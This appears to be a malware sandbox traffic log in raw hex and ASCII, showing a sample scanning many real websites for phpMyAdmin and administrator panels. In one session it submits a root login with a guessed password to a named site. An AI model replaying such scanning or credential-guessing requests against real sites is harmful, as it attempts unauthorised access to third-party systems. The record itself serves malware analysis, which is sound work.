1dc8<!DOCTYPE html><html lang="de-DE" class="no-js"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' />... This
2024-02-20 23:26:11 UTC	16384	IN	Data Raw: 4b 5a 22 3a 22 4b 61 73 61 63 68 73 74 61 6e 22 2c 22 51 41 22 3a 22 4b 61 74 61 72 22 2c 22 4b 45 22 3a 22 4b 65 6e 69 61 22 2c 22 4b 47 22 3a 22 4b 69 72 67 69 73 69 73 74 61 6e 22 2c 22 4b 49 22 3a 22 4b 69 72 69 62 61 74 69 22 2c 22 55 4d 22 3a 22 4b 6c 65 69 6e 65 72 65 20 49 6e 73 65 6c 62 65 73 69 74 7a 75 6e 67 65 6e 20 64 65 72 20 56 65 72 65 69 6e 69 67 74 65 6e 20 53 74 61 61 74 65 6e 22 2c 22 43 43 22 3a 22 4b 6f 6b 6f 73 69 6e 73 65 6c 6e 22 2c 22 43 4f 22 3a 22 4b 6f 6c 75 6d 62 69 65 6e 22 2c 22 4b 4d 22 3a 22 4b 6f 6d 6f 72 65 6e 22 2c 22 43 47 22 3a 22 4b 6f 6e 67 6f 22 2c 22 43 44 22 3a 22 4b 6f 6e 67 6f 2c 20 44 65 6d 6f 6b 72 61 74 69 73 63 68 65 20 52 65 70 75 62 6c 69 6b 22 2c 22 4b 52 22 3a 22 4b 6f 72 65 61 22 2c 22 48 52 22 3a 22 Data Ascii: KZ":"Kasachstan","QA":"Katar","KE":"Kenia","KG":"Kirgisistan","KI":"Kiribati","UM":"Kleinere Inselbesitzungen der Vereinigten Staaten","CC":"Kokosinseln","CO":"Kolumbien","KM":"Komoren","CG":"Kongo","CD":"Kongo, Demokratische Republik","KR":"Korea","HR":"
2024-02-20 23:26:11 UTC	15044	IN	Data Raw: 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 7b 62 6f 72 64 65 72 2d Data Ascii: ransform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.6	58326	217.26.61.200	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	170	OUT	GET /phpmyadmin/ HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:11 UTC	458	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache Set-Cookie: PHPSESSID=2t4c8juom6focs8erkpfrjb6er2og151; path=/ Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Link: <https://eskimo.ch/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:11 UTC	7734	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 2d 43 48 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 20 3e 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4b 35 32 4d 59 4b 4c 43 48 45 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 Data Ascii: 2000<!DOCTYPE html><html dir="ltr" lang="de-CH" prefix="og: https://ogp.me/ns#"><head >... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=G-K52MYKLCHE"></script><script> window.dataLay
2024-02-20 23:26:11 UTC	464	IN	Data Raw: 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 Data Ascii: lock-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8
2024-02-20 23:26:11 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:11 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 6e 67 2d 6c 65 66 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 70 61 64 64 69 6e 67 3a 2e 33 37 35 65 6d 20 2e 36 32 35 65 6d 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f Data Ascii: 2000ng-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-blo
2024-02-20 23:26:11 UTC	6	IN	Data Raw: 61 79 2d 62 6f 72 Data Ascii: ay-bor
2024-02-20 23:26:11 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:11 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 Data Ascii: 2000der-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important
2024-02-20 23:26:11 UTC	6	IN	Data Raw: 61 6c 2d 63 6f 6c Data Ascii: al-col
2024-02-20 23:26:11 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:11 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 6f 72 2d 61 63 63 65 6e 74 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 7b 2d 2d 64 69 76 69 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 5f 5f 74 65 78 74 7b 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 73 65 63 6f 6e 64 61 72 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 20 29 2c 20 53 61 6e 73 Data Ascii: 2000or-accent );}.elementor-widget-divider{--divider-color:var( --e-global-color-secondary );}.elementor-widget-divider .elementor-divider__text{color:var( --e-global-color-secondary );font-family:var( --e-global-typography-secondary-font-family ), Sans

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.6	58413	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	175	OUT	GET /administrator/ HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_cdDhc6grBnY69lk6FhkcPbUXoD/TBdKHtw6J+DX3vRqfQoyao3Hp69WNKNo0aQYgWMApxAXOJ1QyWAWVGH22XQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:10 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.6	58511	15.161.71.77	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	182	OUT	GET /phpmyadmin HTTP/1.1 Host: iisalessandrini.edu.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:11 UTC	418	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: same-origin Cache-Control: no-cache, private Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:11 UTC	7	IN	Data Raw: 31 62 66 63 65 0d 0a Data Ascii: 1bfce
2024-02-20 23:26:11 UTC	16384	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 74 22 20 73 74 79 6c 65 3d 22 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 6f 70 61 63 69 74 79 3a 30 3b 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4c 61 20 70 61 67 69 6e 61 20 6e 6f 6e 20 c3 a8 20 73 74 61 Data Ascii: <!doctype html><html lang="it" style="visibility:hidden;opacity:0;"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>La pagina non sta
2024-02-20 23:26:11 UTC	16384	IN	Data Raw: 34 37 2c 30 6c 30 2c 32 31 2e 33 31 6c 36 2e 36 32 34 2c 30 6c 30 2c 2d 31 30 2e 35 36 36 63 30 2c 2d 32 2e 37 38 39 20 30 2e 35 31 35 2c 2d 35 2e 34 38 38 20 33 2e 39 37 38 2c 2d 35 2e 34 38 38 63 33 2e 34 36 33 2c 30 20 33 2e 34 32 37 2c 33 2e 31 39 37 20 33 2e 34 32 37 2c 35 2e 36 36 35 6c 30 2c 31 30 2e 33 38 39 6c 36 2e 36 32 34 2c 30 6c 30 2c 2d 31 31 2e 37 32 31 63 30 2c 2d 35 2e 37 33 36 20 2d 31 2e 32 32 35 2c 2d 31 30 2e 31 35 37 20 2d 37 2e 39 33 38 2c 2d 31 30 2e 31 35 37 5a 6d 2d 32 30 2e 31 39 31 2c 2d 31 30 2e 30 38 37 63 2d 30 2e 30 30 36 2c 30 20 2d 30 2e 30 31 32 2c 30 20 2d 30 2e 30 31 37 2c 30 63 2d 32 2e 31 31 34 2c 30 20 2d 33 2e 38 35 34 2c 31 2e 37 34 20 2d 33 2e 38 35 34 2c 33 2e 38 35 34 63 30 2c 32 2e 31 31 33 20 31 2e 37 34 2c Data Ascii: 47,0l0,21.31l6.624,0l0,-10.566c0,-2.789 0.515,-5.488 3.978,-5.488c3.463,0 3.427,3.197 3.427,5.665l0,10.389l6.624,0l0,-11.721c0,-5.736 -1.225,-10.157 -7.938,-10.157Zm-20.191,-10.087c-0.006,0 -0.012,0 -0.017,0c-2.114,0 -3.854,1.74 -3.854,3.854c0,2.113 1.74,
2024-02-20 23:26:11 UTC	16384	IN	Data Raw: 2e 32 63 2d 32 2e 30 38 33 2c 30 20 2d 33 2e 38 34 32 2c 31 2e 33 34 31 20 2d 34 2e 35 30 34 2c 33 2e 32 6c 2d 35 2e 33 39 2c 30 63 2d 30 2e 36 36 34 2c 2d 31 2e 38 35 39 20 2d 32 2e 34 32 33 2c 2d 33 2e 32 20 2d 34 2e 35 30 36 2c 2d 33 2e 32 63 2d 32 2e 30 38 33 2c 30 20 2d 33 2e 38 34 32 2c 31 2e 33 34 31 20 2d 34 2e 35 30 34 2c 33 2e 32 6c 2d 31 2e 38 39 36 2c 30 6c 30 2c 2d 31 2e 36 63 30 2c 2d 31 2e 37 36 36 20 31 2e 34 33 35 2c 2d 33 2e 32 20 33 2e 32 2c 2d 33 2e 32 6c 32 32 2e 32 37 32 2c 30 63 30 2e 30 37 35 2c 30 2e 35 32 35 20 30 2e 31 32 38 2c 31 2e 30 35 36 20 30 2e 31 32 38 2c 31 2e 36 6c 30 2c 33 2e 32 5a 22 0a 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 22 20 2f 3e 0a 20 20 20 20 Data Ascii: .2c-2.083,0 -3.842,1.341 -4.504,3.2l-5.39,0c-0.664,-1.859 -2.423,-3.2 -4.506,-3.2c-2.083,0 -3.842,1.341 -4.504,3.2l-1.896,0l0,-1.6c0,-1.766 1.435,-3.2 3.2,-3.2l22.272,0c0.075,0.525 0.128,1.056 0.128,1.6l0,3.2Z" style="fill-rule:nonzero;" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.6	58967	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	398	OUT	POST /phpmyadmin/index.php?route=/ HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip Cookie: phpMyAdmin_https=lv324hi5uec14end8mi8sc3po8; pma_lang_https=en User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://fortressrealcapital.com/phpmyadmin/ Content-Length: 147 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:10 UTC	147	OUT	Data Raw: 72 6f 75 74 65 3d 25 32 46 26 6c 61 6e 67 3d 65 6e 26 74 6f 6b 65 6e 3d 32 32 35 35 33 65 35 37 37 36 36 63 36 34 35 39 33 30 32 35 37 38 33 61 32 65 35 66 34 30 37 61 26 73 65 74 5f 73 65 73 73 69 6f 6e 3d 6c 76 33 32 34 68 69 35 75 65 63 31 34 65 6e 64 38 6d 69 38 73 63 33 70 6f 38 26 70 6d 61 5f 75 73 65 72 6e 61 6d 65 3d 72 6f 6f 74 26 70 6d 61 5f 70 61 73 73 77 6f 72 64 3d 66 6f 72 74 72 65 73 73 25 32 31 26 73 65 72 76 65 72 3d 31 Data Ascii: route=%2F&lang=en&token=22553e57766c64593025783a2e5f407a&set_session=lv324hi5uec14end8mi8sc3po8&pma_username=root&pma_password=fortress%21&server=1
2024-02-20 23:26:11 UTC	1361	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-ob_mode: 1 x-frame-options: DENY referrer-policy: no-referrer content-security-policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-content-security-policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-webkit-csp: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; x-xss-protection: 1; mode=block x-content-type-options: nosniff x-permitted-cross-domain-policies: none x-robots-tag: noindex, nofollow expires: Tue, 20 Feb 2024 23:26:11 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 pragma: no-cache vary: Accept-Encoding set-cookie: phpMyAdmin_https=mj31857k1lt0l2qknhqfbpsjua; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict set-cookie: pmaAuth-1_https=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/phpmyadmin/; secure last-modified: Tue, 20 Feb 2024 23:26:11 GMT
2024-02-20 23:26:11 UTC	453	IN	Data Raw: 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 49 30 51 30 48 6e 76 35 79 46 51 55 52 48 47 79 43 66 4d 4e 6f 53 25 32 42 47 4f 50 66 58 77 59 4f 25 32 42 54 6c 25 32 46 46 79 72 34 25 32 42 7a 32 51 38 4e 32 6e 41 37 53 56 4c 7a 62 45 6f 31 36 38 53 61 37 51 72 6e 63 50 7a 4c 4f 4a 4a 6f 68 4c 73 76 44 25 32 46 66 72 51 48 4c 79 4a 78 68 77 6c 65 78 7a 37 55 70 54 53 25 32 42 4e 53 6e 66 4e 62 6f 72 6f 72 50 57 32 5a 55 62 4c 57 71 62 55 48 54 33 33 76 6b 34 32 37 56 31 78 54 4e 70 70 6b 78 30 Data Ascii: CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I0Q0Hnv5yFQURHGyCfMNoS%2BGOPfXwYO%2BTl%2FFyr4%2Bz2Q8N2nA7SVLzbEo168Sa7QrncPzLOJJohLsvD%2FfrQHLyJxhwlexz7UpTS%2BNSnfNbororPW2ZUbLWqbUHT33vk427V1xTNppkx0
2024-02-20 23:26:11 UTC	1369	IN	Data Raw: 34 39 31 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 4915<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:11 UTC	1369	IN	Data Raw: 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 61 6a 61 78 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6b 65 79 68 61 6e 64 6c 65 72 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 Data Ascii: src="js/dist/ajax.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/keyhandler.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/jquery/jquery-ui.min.js?v=5.2.1"></script>
2024-02-20 23:26:11 UTC	1369	IN	Data Raw: 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 64 6f 63 6c 69 6e 6b 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 66 75 6e 63 74 69 6f 6e 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6e Data Ascii: data-cfasync="false" type="text/javascript" src="js/dist/doclinks.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/functions.js?v=5.2.1"></script> <script 